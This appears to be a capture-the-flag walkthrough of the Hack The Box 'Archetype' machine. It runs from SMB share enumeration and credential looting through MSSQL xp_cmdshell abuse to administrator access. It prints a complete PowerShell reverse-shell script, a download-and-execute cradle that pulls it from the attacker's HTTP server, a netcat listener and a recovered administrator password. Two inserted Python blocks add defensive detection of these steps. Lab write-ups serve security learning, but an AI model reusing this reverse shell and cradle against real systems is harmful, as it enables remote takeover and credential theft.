


As always, let's start with nmap:

nmap -sV -sC IP

Replace IP with the IP of your target machine (Archetype).

The IP of the target machine is not fixed, so make sure you type the correct one. You can find it on your Hack The Box account.

We can see that port 445 is open which is usually associated with file sharing (SMB). So let's find out if we can list the shares available using:

smbclient -L IP

SMB authentication always requires a username. If you don't specify one, smbclient uses your VM username by default.

When prompted for the password, just press Enter.

We can see there are 4 shares available. Let's check the first share called ADMIN$

smbclient \\\\IP\\ADMIN$

When prompted for the password, just press enter.

Access is denied.

Let's check the second share called backups:

smbclient \\\\IP\\backups

When prompted for the password, just press enter.

We got access to that share!


Let's download the file prod.dtsConfig to our VM

get prod.dtsConfig
The get command downloads the file into the directory you started smbclient from (here, your home directory). Open your home directory and check the content of that file.

Looks like we found some credentials:

User ID=ARCHETYPE\sql_svc


To exit the share, just type:


Let's move on. The nmap scan we ran at the beginning also showed that port 1433 is open, which is usually associated with Microsoft SQL Server. Now that we have some credentials, we just need a way to connect and authenticate to the MSSQL server. Let's use Impacket's mssqlclient tool to do that.

locate mssqlclient

Let's change directory:

cd /usr/share/doc/python3-impacket/examples

This tells us that we need to type: username@targetIP

This also tells us that we need to add -windows-auth

python3 mssqlclient.py sql_svc@IP -windows-auth

Type the password we found earlier:


We successfully authenticated to the Microsoft SQL server!


Looks like we can use xp_cmdshell followed by the command we want to execute, using xp_cmdshell {cmd}

First, we need to enable it by typing enable_xp_cmdshell


We are told to run the RECONFIGURE statement to install


Now we can use xp_cmdshell followed by the command we want to execute:

xp_cmdshell whoami

Now let's find out whether we have sysadmin rights by typing:


The output is 1, which means we are part of the sysadmin group!
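Because xp_cmdshell runs its command as a child of the SQL Server service process, the defensive counterpart to this step is a detection rule on process lineage. The following added example (not from the original walkthrough) applies such a rule to a few constructed process-creation records in a Sysmon-like shape; host name, paths, timestamps and the ATTACKER_IP URL are placeholders, and the rule also covers the PowerShell download step used later in the post.

```python
# Constructed process-creation records in a Sysmon-Event-1-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:01Z", "host": "ARCHETYPE", "user": "ARCHETYPE\\sql_svc",
     "parent_image": "C:\\MSSQL\\Binn\\sqlservr.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"ts": "2024-01-01T10:02:17Z", "host": "ARCHETYPE", "user": "ARCHETYPE\\sql_svc",
     "parent_image": "C:\\MSSQL\\Binn\\sqlservr.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/shell.ps1')"},
    {"ts": "2024-01-01T10:03:00Z", "host": "ARCHETYPE", "user": "ARCHETYPE\\alice",
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe"},
    {"ts": "2024-01-01T10:04:00Z", "host": "ARCHETYPE", "user": "NT SERVICE\\MSSQLSERVER",
     "parent_image": "C:\\MSSQL\\Binn\\sqlservr.exe",
     "image": "C:\\Windows\\System32\\conhost.exe", "command_line": "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Substrings typical of a download-and-execute cradle, as in the walkthrough's last xp_cmdshell step.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "iex ", "invoke-expression", "frombase64string")

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Alert when the SQL Server service spawns a shell; escalate if the command looks like a cradle."""
    if basename(event["parent_image"]) != "sqlservr.exe" or basename(event["image"]) not in SHELLS:
        return None
    cmd = event["command_line"].lower()
    severity = "high" if any(m in cmd for m in CRADLE_MARKERS) else "medium"
    return {"ts": event["ts"], "host": event["host"], "user": event["user"], "severity": severity,
            "reason": "shell spawned by sqlservr.exe (xp_cmdshell pattern)",
            "command_line": event["command_line"]}

def detect(events):
    """Run classify over a batch of events and keep only the alerts."""
    return [alert for alert in map(classify, events) if alert]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["ts"], alert["user"], alert["command_line"])
```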

We just need to change two things in the script below:

- The IP ---> this is the IP of your VM (the attacker's machine)

If you don't know your IP, open a new command prompt window and type ifconfig

- The port number ---> this is the port on which you will listen using netcat. We will start our netcat listener on port 4444

$client = New-Object System.Net.Sockets.TCPClient("IP",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Go to your Downloads folder and create a new file called shell.ps1

Open it and copy paste the script above, then save your file.

Now we need to get the target machine to go and download our PowerShell script shell.ps1

To do that, we will create a simple web server on our attacker's machine (our VM):

From your VM, open a new command prompt window and go to the Downloads directory:

cd Downloads
sudo python3 -m http.server 8080

This command starts a web server that serves our current directory (the Downloads directory).

Do not close this window! Otherwise it will stop your web server.

Open your browser and check that the web server is reachable. The IP I used is the IP of my VM; it will be different for you, so make sure you type your VM's IP. If you don't know the IP of your VM, open a new command prompt window and type ifconfig.

Now we need to install ufw (uncomplicated firewall) on our VM.

Open a new command prompt window and type

sudo apt install ufw

sudo ufw enable

We now need to add a rule so that the target machine can connect back to our attacker machine (our VM)

sudo ufw allow from IP proto tcp to any port 8080,4444

IP is the IP of the target machine.

port 8080 because our webserver is on port 8080

port 4444 because we will start our netcat listener on port 4444

Now, still from your VM, open a new command prompt window and set up your netcat listener

nc -lnvp 4444

Only after you set up your netcat, go back to the target machine and type:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://VM_IP:8080/shell.ps1\");"

Replace VM_IP with the IP of your VM (the attacker's machine); the IP of your VM will be different from mine. If you don't know the IP of your VM, open a new command prompt window and type ifconfig.

Go back to your netcat and you should have a connection:



cd C:\Users
cd sql_svc
cd Desktop
type user.txt


You got the user flag! Congratulations!

It's always good to check the console history file where we can see the frequently accessed files and/or any executed commands. The history file is called ConsoleHost_history.txt and can be found in this directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine

cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
cat ConsoleHost_history.txt

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

We just found more credentials!

The net use (or net.exe use) command connects to a shared resource and shows detailed information about currently mapped drives and devices. It is used this way:

net use [{devicename | *}] \\computername\sharename /user:username

devicename ---> the drive letter to map the share to (here, drive letter T)

\\computername\sharename ---> the name of the computer (computername) and of the shared resource (sharename)

More info on net use can be found at
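The history file gave away a password because net use accepts it as a positional argument on the command line. As an added example (not part of the original post), the Python below scans ConsoleHost_history.txt content for such lines and returns redacted findings; the sample history is constructed, apart from the net use line quoted above, and the Invoke-Sqlcmd entry is made up.

```python
import re

# Constructed ConsoleHost_history.txt content: line 1 is the entry the walkthrough found, the rest is made up.
SAMPLE_HISTORY = """net.exe use T: \\\\Archetype\\backups /user:administrator MEGACORP_4dm1n!!
exit
net use * \\\\fileserver\\share * /user:CORP\\alice
Invoke-Sqlcmd -ServerInstance . -Username sa -Password Sup3rS3cret!
"""
# Fallback for other tools that take a password inline (-Password x, password=x, pwd:x).
GENERIC_SECRET = re.compile(r"(?i)(?:-password|password|pwd)[\s=:]+(\S+)")

def parse_net_use(tokens):
    """Return (share, user, password) for a 'net use' line, else None; the password is positional, '*' means prompt."""
    if len(tokens) < 2 or tokens[0].lower() not in ("net", "net.exe") or tokens[1].lower() != "use":
        return None
    share = user = password = None
    for tok in tokens[2:]:
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
        elif tok.startswith("/"):
            continue                      # other switches, e.g. /persistent:yes
        elif tok.startswith("\\\\"):
            share = tok
        elif tok == "*" or (len(tok) == 2 and tok[1] == ":"):
            continue                      # drive letter, or '*' for "choose a letter" / "prompt for password"
        else:
            password = tok                # the only remaining positional argument is the password
    return share, user, password

def scan_history(text):
    """Flag history lines that carry a credential in clear text and return them redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        tokens = line.split()
        parsed = parse_net_use(tokens) if tokens else None
        if parsed:
            share, user, password = parsed
            if password:
                findings.append({"line": lineno, "kind": "net use", "user": user, "share": share,
                                 "redacted": line.replace(password, "***")})
            continue
        match = GENERIC_SECRET.search(line)
        if match:
            findings.append({"line": lineno, "kind": "inline secret", "user": None, "share": None,
                             "redacted": line.replace(match.group(1), "***")})
    return findings

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']} [{f['kind']}] {f['redacted']}")
```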

Privilege Escalation

Impacket also has a tool we can use to connect to the server with the credentials we just found.

From your VM, open a new prompt window


cd /usr/share/doc/python3-impacket/examples

python3 administrator@IP

IP is the IP of the target machine.

Type the password we just found and press enter



We just escalated our privileges and we are now the nt authority\system

You can usually find the root flag at C:\Users\Administrator\Desktop

cd C:\Users\Administrator\Desktop
type root.txt


Congratulations! You got the root flag!
